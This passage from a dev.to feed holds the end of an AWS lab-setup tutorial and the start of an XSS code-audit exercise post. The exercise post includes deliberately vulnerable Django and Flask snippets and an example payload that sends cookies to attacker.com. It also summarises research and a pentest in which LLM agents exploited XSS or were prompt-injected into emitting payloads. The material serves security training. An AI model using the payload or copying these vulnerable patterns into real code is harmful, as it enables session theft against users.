xxxxxxxxxxxxxxxxxxxx:your_username_here"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Account"</span><span class="p">:</span><span class="w"> </span><span class="s2">"YOUR_ACCOUNT_ID"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Arn"</span><span class="p">:</span><span class="w"> </span><span class="s2">"arn:aws:sts::YOUR_ACCOUNT_ID:assumed-role/AWSReservedSSO_lab-power-user_xxxxxxxxxxxxxxxxx/your_username_here"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>Notice <strong><code>assumed-role</code></strong> in the ARN. These are temporary credentials that expire in 8 hours. The access key showed <code>user/your_username_here</code> — a permanent identity. This is the difference.</p> <p>✅ <strong>IAM Identity Center confirmed working.</strong></p> <h2> Part 12: Create the Launch Template </h2> <p>A Launch Template saves all instance configuration. <code>lab-create</code> uses it to launch an identical fresh instance with one command.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>EC2 → Launch Templates → Create launch template Launch template name: suricata-lab-template Description: Debian 13 + SSM Agent via User Data AMI: Debian 13 <span class="o">(</span>official Debian publisher<span class="o">)</span> Instance <span class="nb">type</span>: t2.micro Key pair: Don<span class="s1">'t include in launch template Security group: Select existing → suricata-lab-sg Advanced details: IAM instance profile: suricata-lab-ssm-role User data: #!/bin/bash apt-get update -y wget https://s3.amazonaws.com/ec2-downloads-windows/SSMAgent/latest/debian_amd64/amazon-ssm-agent.deb dpkg -i amazon-ssm-agent.deb systemctl enable amazon-ssm-agent systemctl start amazon-ssm-agent → Create launch template </span></code></pre> </div> <h2> Part 13: Update Fish Functions for SSO Profile </h2> <p>Add <code>--profile lab-sso</code> to all functions that make AWS CLI calls. Overwrite the files created in Part 8:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code># Rewrite lab-connect echo 'function lab-connect aws ssm start-session --target $INSTANCE_ID --profile lab-sso end' &gt; ~/.config/fish/functions/lab-connect.fish # Rewrite lab-status echo 'function lab-status aws ec2 describe-instances --instance-ids $INSTANCE_ID \ --profile lab-sso \ --query "Reservations[0].Instances[0].State.Name" \ --output text end' &gt; ~/.config/fish/functions/lab-status.fish # Rewrite lab-start echo 'function lab-start aws ec2 start-instances --instance-ids $INSTANCE_ID --profile lab-sso echo "Starting... wait 60 seconds" end' &gt; ~/.config/fish/functions/lab-start.fish # Rewrite lab-stop echo 'function lab-stop aws ec2 stop-instances --instance-ids $INSTANCE_ID --profile lab-sso echo "Stopping..." end' &gt; ~/.config/fish/functions/lab-stop.fish # Rewrite lab-terminate echo 'function lab-terminate echo "WARNING: Permanently deletes instance and all data on it." echo "Instance: $INSTANCE_ID" read --prompt-str "Type YES to confirm: " confirm if test "$confirm" = "YES" aws ec2 terminate-instances \ --instance-ids $INSTANCE_ID --profile lab-sso echo "Instance terminated. Use lab-create to launch a fresh one." else echo "Cancelled." end end' &gt; ~/.config/fish/functions/lab-terminate.fish </code></pre> </div> <h2> Part 14: Fix the iam:PassRole Error </h2> <p>When you first run <code>lab-create</code> you will hit this:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>aws: [ERROR]: An error occurred (UnauthorizedOperation) when calling the RunInstances operation: You are not authorized to perform: iam:PassRole on resource: ...suricata-lab-ssm-role... </code></pre> </div> <p><strong>Why this happens:</strong> PowerUserAccess blocks all <code>iam:*</code> actions including <code>iam:PassRole</code>. Without it, <code>your_username_here</code> cannot assign <code>suricata-lab-ssm-role</code> to the new EC2 instance.</p> <p><strong>Why this matters for security:</strong> Without restricting <code>iam:PassRole</code>, a user with EC2 launch permissions could attach an <code>AdministratorAccess</code> role to an instance and then connect to it — escalating from PowerUser to full Administrator through the instance. The restriction closes this path.</p> <p><strong>The fix:</strong> Add a narrow inline policy to <code>lab-power-user</code> that grants <code>iam:PassRole</code> only for this specific role, only to EC2:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>IAM Identity Center → Permission sets → lab-power-user → Inline policy → Add inline policy </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"Version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2012-10-17"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Statement"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"Effect"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Allow"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Action"</span><span class="p">:</span><span class="w"> </span><span class="s2">"iam:PassRole"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Resource"</span><span class="p">:</span><span class="w"> </span><span class="s2">"arn:aws:iam::YOUR_ACCOUNT_ID:role/suricata-lab-ssm-role"</span><span class="p">,</span><span class="w"> </span><span class="nl">"Condition"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"StringEquals"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"iam:PassedToService"</span><span class="p">:</span><span class="w"> </span><span class="s2">"ec2.amazonaws.com"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">]</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>→ Save changes (Reprovisioning happens automatically — wait ~30 seconds) </code></pre> </div> <p>Two restrictions make this safe:</p> <ul> <li> <code>Resource</code> — only <code>suricata-lab-ssm-role</code>, not any other role in the account</li> <li> <code>iam:PassedToService</code> — only to EC2, not Lambda, ECS, or anything else</li> </ul> <h2> Part 15: lab-create — Launch Fresh Instances On Demand </h2> <p><strong>lab-create.fish</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>function lab-create echo "Launching new suricata-ids-lab instance..." set new_id (aws ec2 run-instances \ --launch-template LaunchTemplateName=suricata-lab-template \ --tag-specifications "ResourceType=instance,Tags=[{Key=Name,Value=suricata-ids-lab}]" \ --profile lab-sso \ --query "Instances[0].InstanceId" \ --output text) if test -z "$new_id" echo "ERROR: Failed to launch instance." return 1 end echo "Instance launched: $new_id" echo "Updating INSTANCE_ID..." set -U INSTANCE_ID $new_id echo "Waiting for instance to reach running state..." aws ec2 wait instance-running \ --instance-ids $new_id \ --profile lab-sso echo "Instance is running." echo "Waiting 3 minutes for SSM Agent to initialize..." sleep 180 echo "Ready. Run lab-connect to start your session." end </code></pre> </div> <p><strong>What this does step by step:</strong></p> <ol> <li>Calls <code>aws ec2 run-instances</code> using the Launch Template — no need to specify AMI, security group, IAM profile, or User Data manually</li> <li>Captures the new instance ID</li> <li>Automatically runs <code>set -U INSTANCE_ID</code> — all other functions point to the new instance immediately</li> <li> <code>aws ec2 wait instance-running</code> — blocks until AWS confirms the instance is running</li> <li> <code>sleep 180</code> — waits for the User Data SSM Agent install to complete</li> <li>Prints "Ready"</li> </ol> <h2> Part 16: Complete Daily Workflow </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code># Start of session lab-login # browser opens → tap YubiKey → 8hr credentials issued # Launch fresh instance lab-create # launches, waits for running, waits 3min for SSM Agent # Do work lab-connect # shell as ssm-user — no SSH, no ports, no keys # End of session lab-terminate # permanently deletes instance → zero ongoing cost </code></pre> </div> <p><strong>Between sessions:</strong></p> <ul> <li>No running EC2 instance — no compute charges</li> <li>No EBS volume — no storage charges </li> <li>No static credentials on disk — credentials expired</li> <li>Every <code>lab-create</code> starts completely fresh from the Launch Template</li> </ul> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Metric</th> <th>Access Key</th> <th>Identity Center</th> </tr> </thead> <tbody> <tr> <td>Auth on CLI</td> <td>Static key, no MFA</td> <td>YubiKey tap per session</td> </tr> <tr> <td>Credentials expire</td> <td>Never</td> <td>Every 8 hours</td> </tr> <tr> <td>Port 22 required</td> <td>No (SSM)</td> <td>No (SSM)</td> </tr> <tr> <td>SSH keys required</td> <td>No</td> <td>No</td> </tr> <tr> <td>VPN compatibility</td> <td>Irrelevant</td> <td>Irrelevant</td> </tr> <tr> <td>Cost when not working</td> <td>Stop: ~$0.08/GB EBS</td> <td>Terminate: <strong>$0.00</strong> </td> </tr> </tbody> </table></div> <h2> What Curriculum Weeks This Covers </h2> <p>This went well beyond the Week 9 IDS lab it was meant to support:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Topic</th> <th>Curriculum Week</th> </tr> </thead> <tbody> <tr> <td>EC2, security groups, IAM roles, SSM</td> <td>Week 15</td> </tr> <tr> <td>AWS IAM users, access keys, MFA</td> <td>Week 15</td> </tr> <tr> <td>IAM Identity Center (SSO) setup</td> <td><strong>Week 49</strong></td> </tr> <tr> <td>Permission sets, PassRole patterns</td> <td><strong>Week 49</strong></td> </tr> <tr> <td>Launch Templates, instance lifecycle</td> <td><strong>Week 50</strong></td> </tr> </tbody> </table></div> <p>Weeks 49-50 are normally scheduled for January 2027. Completed early as infrastructure prerequisites for the IDS lab.</p> <h2> Common Issues and Fixes </h2> <h3> Issue 1 — SSO Token Expired </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>aws: [ERROR]: Error when retrieving token from sso: Token has expired and refresh failed </code></pre> </div> <p>This is IAM Identity Center <strong>working exactly as designed</strong>. The 8-hour session expired. Fix:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>lab-login </code></pre> </div> <p>Browser opens → tap YubiKey → new 8-hour session issued. Then continue normally:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>lab-status lab-connect </code></pre> </div> <p>This is the entire cost of IAM Identity Center over static access keys — one YubiKey tap per 8-hour session. A fair tradeoff for credentials that auto-expire and can never be leaked permanently.</p> <h3> Issue 2 — lab-status Returns "None" </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>lab-status # → None </code></pre> </div> <p>The previous instance was terminated. <code>INSTANCE_ID</code> is pointing to a dead instance ID. Fix:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>lab-create </code></pre> </div> <p><code>lab-create</code> launches a fresh instance and automatically runs <code>set -U INSTANCE_ID</code> with the new ID. All other functions update immediately. No manual intervention needed.</p> <h3> Issue 3 — lab-connect Fails After lab-create </h3> <p>If <code>lab-connect</code> fails immediately after <code>lab-create</code> completes:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>SessionManagerPlugin is not found </code></pre> </div> <p>Install the Session Manager plugin locally (see Part 7). One-time setup.</p> <p>If the plugin is installed but you still get "instance not reachable":<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code># The SSM Agent may still be initializing # Wait 2-3 more minutes and try again lab-connect </code></pre> </div> <p>The <code>sleep 180</code> in <code>lab-create</code> handles most cases but on a slow boot it may need another minute.</p> <h3> Issue 4 — lab-terminate Skips Confirmation and Immediately Terminates </h3> <p>You used <code>--prompt</code> instead of <code>--prompt-str</code> in the function definition. Fish requires <code>--prompt-str</code>. Rewrite the function:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>echo 'function lab-terminate echo "WARNING: Permanently deletes instance and all data on it." echo "Instance: $INSTANCE_ID" read --prompt-str "Type YES to confirm: " confirm if test "$confirm" = "YES" aws ec2 terminate-instances \ --instance-ids $INSTANCE_ID --profile lab-sso echo "Instance terminated. Use lab-create to launch a fresh one." else echo "Cancelled." end end' &gt; ~/.config/fish/functions/lab-terminate.fish </code></pre> </div> <h2> The Open Source Project Behind This </h2> <p>These exercises are part of a larger project: an open source repository of LeetCode-style <strong>secure coding exercises</strong> designed to:</p> <ol> <li>Train developers to write secure code</li> <li>Prepare security engineers for technical interviews</li> </ol> <p><strong>If this post was useful, the best thing you can do is star the repo:</strong></p> <p><a href="https://github.com/fosres/SecEng-Exercises" class="crayons-btn crayons-btn--primary" rel="noopener noreferrer">Support this project — Star it on GitHub! ⭐</a> </p> <p>Stars help the repo appear in GitHub search and signal to AI companies that this dataset is worth using.</p> <h2> One More Thing — Quick Poll </h2> <p>Why do you read security engineering blog posts? Your answer helps me write better content:</p> <p><strong>👉 <a href="https://strawpoll.com/wby5QoKAkyA" rel="noopener noreferrer">Take the poll</a></strong></p> <p>Takes 10 seconds.</p> <h2> Next in This Series </h2> <p><strong>Week 9 Part 2</strong> — Now that the lab is running, the actual Suricata IDS setup: installing Suricata on Debian 13, writing 5 custom detection rules (SQL injection focus), PCAP analysis, and the AWS Network Firewall connection — every Suricata rule in this lab is directly portable to AWS Network Firewall because AWS uses Suricata-compatible IPS rules natively since November 2020.</p> <p><em>Series: Security Engineering Interview Prep | Week 9 | March 2026</em><br><br> <em>GitHub: <a href="https://github.com/fosres/SecEng-Exercises" rel="noopener noreferrer">fosres/SecEng-Exercises</a></em></p> aws security devsecops tutorial fosres Tue, 10 Mar 2026 22:53:01 +0000 https://dev.to/fosres/audit-60-fullstack-snippets-for-xss-3c9h https://dev.to/fosres/audit-60-fullstack-snippets-for-xss-3c9h <h1> 70 XSS Code Audit Cases: Can You Find Every Bug Before an LLM Does It For Them? </h1> <h2> series: Security Engineering Interview Prep </h2> <p><a href="https://github.com/fosres/SecEng-Exercises" class="crayons-btn crayons-btn--primary" rel="noopener noreferrer">Star SecEng-Exercises on GitHub ⭐</a> </p> <h2> LLMs Are Already Exploiting XSS. The Research Proves It. </h2> <p>No government or criminal organization has been publicly attributed with using an LLM to exploit XSS in the wild — yet. But the academic evidence that it is coming, and soon, is unambiguous.</p> <p>In 2024, researchers at the University of Illinois gave a GPT-4 agent a list of real, publicly disclosed CVEs and told it to exploit them autonomously — no human guidance, no hints beyond the CVE description. GPT-4 achieved an <strong>87% success rate</strong>. Every other model they tested, and every open-source vulnerability scanner they ran, found zero. The researchers described this as an "emergent capability." One of GPT-4's only two failures was an XSS vulnerability — and it failed not because XSS was beyond it, but because the target application's JavaScript-heavy navigation made it hard for the agent to reach the vulnerable form field in the first place. The underlying exploit logic was not the obstacle.</p> <p>The same research group then went further. They built teams of specialized LLM agents — including a dedicated XSS agent — and demonstrated that these agent teams could autonomously exploit <strong>zero-day</strong> XSS vulnerabilities in open-source CMS software (CVE-2024-27757, CVE-2024-34061) without being given any vulnerability description at all. The agents browsed the application, identified unescaped output, crafted payloads, and confirmed execution.</p> <p>The closest real-world case so far comes from a commercial penetration test documented by security firm Vaadata in 2024. A company had integrated the ChatGPT API into a training platform. By crafting a description that caused ChatGPT's own output to contain a secondary malicious prompt, the pentesters got ChatGPT to emit a working XSS payload in a downstream response — exploiting an unsanitized output sink the developers had not considered an attack surface because it was driven by AI, not by user input directly.</p> <p>That is the new attack surface: not just your input fields, but your AI's output fields.</p> <p>XSS is not a new vulnerability class. It has been on the OWASP Top 10 since the list was first published. Every web security framework ships with autoescaping enabled by default. And yet it remains one of the most consistently discovered vulnerabilities in real-world penetration tests and bug bounty programs — and now, in autonomous LLM agent runs. The gap between "the framework protects you" and "this application is actually safe" is where real bugs live, and that gap is filled with misused APIs, wrong-context escaping, and misplaced sanitization logic.</p> <p>The defences have not changed. But the speed and scale at which the other side can now find the holes has.</p> <p>This blog post is a training set for your brain.</p> <blockquote> <p>🔒 <strong>These cases are part of <a href="https://github.com/fosres/SecEng-Exercises" rel="noopener noreferrer">SecEng-Exercises</a></strong> — an open source repository of LeetCode-style secure coding challenges designed to help train both humans <em>and</em> AI models to write secure code. If this kind of challenge is useful to you, a ⭐ on GitHub helps the project reach more developers and security engineers. More challenges covering SQL injection, authentication flaws, API security, and cryptographic misuse are being added weekly.</p> </blockquote> <h2> The Challenge </h2> <p>Below are <strong>70 code audit cases</strong>. Each presents a realistic web application snippet — Django, Flask, FastAPI, vanilla JavaScript, or React — containing zero, one, or two security bugs related to XSS.</p> <p>For each case, your job is to do three things:</p> <p><strong>1. Identify the XSS type (if any)</strong></p> <ul> <li> <strong>Reflected XSS</strong> — the payload comes from the current request (URL parameter, form field) and is reflected back in the same response</li> <li> <strong>Stored XSS</strong> — the payload is persisted (database, in-memory store) and rendered to a different user or a later request</li> <li> <strong>DOM XSS</strong> — the payload never touches the server; it is injected and executed entirely in client-side JavaScript</li> <li> <strong>No XSS</strong> — the code is functionally safe, but may have display issues worth noting</li> </ul> <p><strong>2. Classify the escaping error</strong></p> <ul> <li> <strong>Missing escaping</strong> — no escaping of any kind is applied at the vulnerable output point</li> <li> <strong>Wrong context escaping</strong> — escaping is applied, but for the wrong output context (e.g. HTML escaping applied to a JavaScript string context)</li> <li> <strong>Misplaced escaping</strong> — escaping is applied in the right context but at the wrong layer (e.g. escaping at input/storage time instead of output/render time, then bypassed by a <code>| safe</code> filter downstream)</li> </ul> <p><strong>3. Write the fix</strong></p> <p>Edit the flawed code snippet so it contains no XSS vulnerabilities and no display issues. Your fix must not break the intended functionality of the code.</p> <h2> Critical Reference Tables </h2> <p>Before you begin, study these tables. They will save you from the most common classification mistakes.</p> <h3> Table 1: The Five Ways Autoescaping Gets Bypassed </h3> <p>Understanding why autoescaping fails is more important than memorising that it exists. Every major Python web framework ships with HTML autoescaping enabled by default for template variables. But all of them provide escape hatches — functions and filters that tell the template engine "I've already handled this, don't escape it." The bug in every case below is that the content has <em>not</em> actually been made safe before that trust is granted.</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Mechanism</th> <th>Framework</th> <th>What it Returns</th> <th>What the Template Does</th> </tr> </thead> <tbody> <tr> <td><code>Markup(x)</code></td> <td>Flask / Jinja2</td> <td> <code>Markup</code> object</td> <td>Skips autoescaping — treats value as already safe HTML</td> </tr> <tr> <td>`{{ x \</td> <td>safe }}`</td> <td>Jinja2 (Flask &amp; FastAPI)</td> <td> <code>Markup</code> object</td> </tr> <tr> <td><code>mark_safe(x)</code></td> <td>Django</td> <td> <code>SafeData</code> object</td> <td>Skips autoescaping — treats value as already safe HTML</td> </tr> <tr> <td><code>{% autoescape off %}</code></td> <td>Django</td> <td>Disables check entirely</td> <td>Skips autoescaping for <strong>all</strong> variables inside the block</td> </tr> <tr> <td> <code>format_html(x)</code> (no <code>{}</code> args)</td> <td>Django</td> <td> <code>SafeString</code> object</td> <td>Skips autoescaping — treats value as already safe HTML</td> </tr> </tbody> </table></div> <p><strong>Why this table matters:</strong> Cases 53–59 all involve one of these five mechanisms. Without understanding this table, you will look at <code>{{ comment }}</code> in a template and think it is safe — because it has no <code>| safe</code> filter — without realising the value itself is already a <code>SafeString</code> from an upstream <code>format_html()</code> call. The vulnerability is invisible at the template layer if you do not trace the type of the value being rendered.</p> <p><strong>Key principle:</strong> Store raw strings. Escape at render time. Never mark a value as safe before you have escaped it.</p> <h3> Table 2: JavaScript Context Escaping by Framework </h3> <p>HTML autoescaping converts <code>&lt;</code> to <code>&amp;lt;</code>, <code>&gt;</code> to <code>&amp;gt;</code>, <code>"</code> to <code>&amp;quot;</code>, and so on. This is sufficient when a value is rendered in <strong>HTML body context</strong> — inside a <code>&lt;p&gt;</code>, <code>&lt;div&gt;</code>, <code>&lt;h1&gt;</code>, etc. It is <strong>not</strong> sufficient when a value is rendered inside a JavaScript string.</p> <p>Consider: <code>var user = "{{ username }}";</code></p> <p>If <code>username</code> is <code>"; fetch('https://attacker.com?q='+document.cookie);//</code>, HTML escaping does nothing — the payload contains no HTML special characters. The <code>"</code> closes the JavaScript string, and the fetch executes.</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Framework</th> <th>Template Filter</th> <th>Notes</th> </tr> </thead> <tbody> <tr> <td>Django</td> <td>`{{ value \</td> <td>escapejs }}`</td> </tr> <tr> <td>Flask (Jinja2)</td> <td>`{{ value \</td> <td>tojson }}`</td> </tr> <tr> <td>FastAPI (Jinja2)</td> <td>`{{ value \</td> <td>tojson }}`</td> </tr> </tbody> </table></div> <p><strong>Why this table matters:</strong> Using <code>| escapejs</code> in a Flask template, or using <code>| tojson</code> in a Django template, is a wrong-context escaping mistake even though the intent is correct. Framework choice determines which filter to reach for.</p> <h3> Table 3: Flask <code>request</code> Object — Which Attribute for Which Input Source </h3> <p>A common mistake in Flask is reading from the wrong attribute of the <code>request</code> object, which can mask where user-controlled input actually comes from. Understanding the source of each value is important for correctly scoping the attack surface.</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Attribute</th> <th>Source</th> <th>HTTP Method</th> <th>Content-Type Required</th> </tr> </thead> <tbody> <tr> <td><code>request.args</code></td> <td>URL query string</td> <td>Any (GET is conventional)</td> <td>None</td> </tr> <tr> <td><code>request.form</code></td> <td>POST body</td> <td>POST</td> <td> <code>application/x-www-form-urlencoded</code> or <code>multipart/form-data</code> </td> </tr> <tr> <td><code>request.get_json()</code></td> <td>POST/PUT/PATCH body</td> <td>POST, PUT, PATCH</td> <td><code>application/json</code></td> </tr> <tr> <td><code>request.data</code></td> <td>Raw body</td> <td>Any non-form type</td> <td>Any non-form Content-Type</td> </tr> <tr> <td><code>request.files</code></td> <td>POST body</td> <td>POST</td> <td><code>multipart/form-data</code></td> </tr> </tbody> </table></div> <p><strong>Why this table matters:</strong> When classifying a case as Reflected vs Stored XSS, you need to know whether the input comes from the current request (<code>request.args</code>, <code>request.form</code>) or from a stored source (database, in-memory list). <code>request.args</code> almost always means GET and therefore Reflected XSS. <code>request.form</code> with a POST route storing to a database means Stored XSS.</p> <h3> Table 4: Defense in Depth — Two Coordinated Fixes (Case 31) </h3> <p>Most XSS bugs require one fix at one layer. Case 31 is the exception: it requires <strong>two coordinated fixes at different layers</strong>. This case is highlighted explicitly because either fix alone leaves a residual vulnerability.</p> <p>The pattern: a server-side template injects a value into a JavaScript string argument, which is then passed to a function that writes to an <code>innerHTML</code> DOM sink.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- Layer 1: JS string context in template --&gt;</span> showBanner("{{ msg }}"); <span class="c">&lt;!-- Layer 2: innerHTML DOM sink inside the function --&gt;</span> function showBanner(msg) { document.getElementById("banner").innerHTML = "<span class="nt">&lt;p&gt;</span>Notification: " + msg + "<span class="nt">&lt;/p&gt;</span>"; } </code></pre> </div> <p>Fix Layer 1 alone (<code>| escapejs</code> on the template): An attacker who can store a value containing <code>&lt;img src=x onerror=...&gt;</code> will have it backslash-escaped in the JS string — but once <code>msg</code> arrives inside <code>showBanner()</code>, the DOM still parses it via <code>innerHTML</code>. Layer 2 is still vulnerable.</p> <p>Fix Layer 2 alone (<code>textContent</code> in <code>showBanner()</code>): An attacker who can break out of the JS string via <code>");</code> will execute arbitrary code before <code>showBanner()</code> is ever called. Layer 1 is still vulnerable.</p> <p><strong>Both fixes are required simultaneously.</strong> This is defense in depth — neither layer alone closes the attack surface.</p> <p>Now go to work.</p> <h2> The 70 Cases </h2> <h3> Case 1 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="k">def</span> <span class="nf">search</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">query</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">GET</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">q</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">results</span> <span class="o">=</span> <span class="p">[]</span> <span class="c1"># imagine DB results here </span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">results.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span><span class="sh">"</span><span class="s">query</span><span class="sh">"</span><span class="p">:</span> <span class="n">query</span><span class="p">,</span> <span class="sh">"</span><span class="s">results</span><span class="sh">"</span><span class="p">:</span> <span class="n">results</span><span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- results.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h2&gt;</span>Results for: {{ query | safe }}<span class="nt">&lt;/h2&gt;</span> {% for result in results %} <span class="nt">&lt;p&gt;</span>{{ result.title }}<span class="nt">&lt;/p&gt;</span> {% endfor %} <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 2 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="kn">from</span> <span class="n">django.utils.html</span> <span class="kn">import</span> <span class="n">escape</span> <span class="k">def</span> <span class="nf">user_profile</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">username</span> <span class="o">=</span> <span class="nf">escape</span><span class="p">(</span><span class="n">request</span><span class="p">.</span><span class="n">GET</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">name</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">))</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">profile.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span><span class="sh">"</span><span class="s">username</span><span class="sh">"</span><span class="p">:</span> <span class="n">username</span><span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- profile.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;head&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">var</span> <span class="nx">currentUser</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">{{ username }}</span><span class="dl">"</span><span class="p">;</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">Logged in as: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">currentUser</span><span class="p">);</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/head&gt;</span> <span class="nt">&lt;body&gt;&lt;h1&gt;</span>Profile<span class="nt">&lt;/h1&gt;&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 3 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="kn">from</span> <span class="n">django.utils.html</span> <span class="kn">import</span> <span class="n">escape</span> <span class="kn">from</span> <span class="n">django.utils.safestring</span> <span class="kn">import</span> <span class="n">mark_safe</span> <span class="k">def</span> <span class="nf">comment_list</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">raw_comments</span> <span class="o">=</span> <span class="n">Comment</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">values_list</span><span class="p">(</span><span class="sh">"</span><span class="s">body</span><span class="sh">"</span><span class="p">,</span> <span class="n">flat</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span> <span class="n">safe_comments</span> <span class="o">=</span> <span class="p">[</span><span class="nf">mark_safe</span><span class="p">(</span><span class="nf">escape</span><span class="p">(</span><span class="n">c</span><span class="p">))</span> <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">raw_comments</span><span class="p">]</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">comments.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span><span class="sh">"</span><span class="s">comments</span><span class="sh">"</span><span class="p">:</span> <span class="n">safe_comments</span><span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- comments.html --&gt;</span> <span class="nt">&lt;ul&gt;</span> {% for comment in comments %} <span class="nt">&lt;li&gt;</span>{{ comment }}<span class="nt">&lt;/li&gt;</span> {% endfor %} <span class="nt">&lt;/ul&gt;</span> </code></pre> </div> <h3> Case 4 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># app.py </span><span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">render_template_string</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">Flask</span><span class="p">(</span><span class="n">__name__</span><span class="p">)</span> <span class="n">TEMPLATE</span> <span class="o">=</span> <span class="sh">"""</span><span class="s"> &lt;html&gt; &lt;body&gt; &lt;h1&gt;Hello, %s!&lt;/h1&gt; &lt;/body&gt; &lt;/html&gt; </span><span class="sh">"""</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/greet</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">greet</span><span class="p">():</span> <span class="n">name</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">name</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">guest</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="nf">render_template_string</span><span class="p">(</span><span class="n">TEMPLATE</span> <span class="o">%</span> <span class="n">name</span><span class="p">)</span> </code></pre> </div> <h3> Case 5 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># app.py </span><span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">render_template_string</span> <span class="kn">from</span> <span class="n">urllib.parse</span> <span class="kn">import</span> <span 